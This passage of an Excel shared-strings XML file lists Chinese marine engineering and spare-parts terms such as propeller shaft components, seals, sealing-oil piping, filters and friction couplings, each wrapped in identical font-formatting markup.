        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨毂毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨型号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨中间轴测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴接地设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋桨轴用衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋接线柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺旋钻头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺柱推力轴提升工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>氯丁橡胶衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器，首次认证</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器芯子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤器中间块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滤芯</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>埋头钻</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲变换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>脉冲轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲板布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲板法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盲铆钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯尺寸检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铆钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>没赋值的信息号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花冲击扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梅花冲击扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>门扣</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>门框</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫维修工具包</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封材料</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封法兰，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封放泄柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封膏</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封工具，驱动装置，注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封工具，推力块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封滑油滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环锥体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环锥销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封剂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封胶</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封面打磨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封面研磨</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈及支撑环</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封压缩工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油泵安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油出口滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油出口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油分配管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油集管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油进口支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油控制单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封装置，离心滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面板工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面积仪</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>面积仪应用</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火管泄放</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灭火水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟器附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟线路图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟信号器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模拟液面指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膜片安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>膜片壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦联轴节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦联轴节部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦联轴器，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦驱动弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨床</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨阀机工作台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨合负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨盘</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
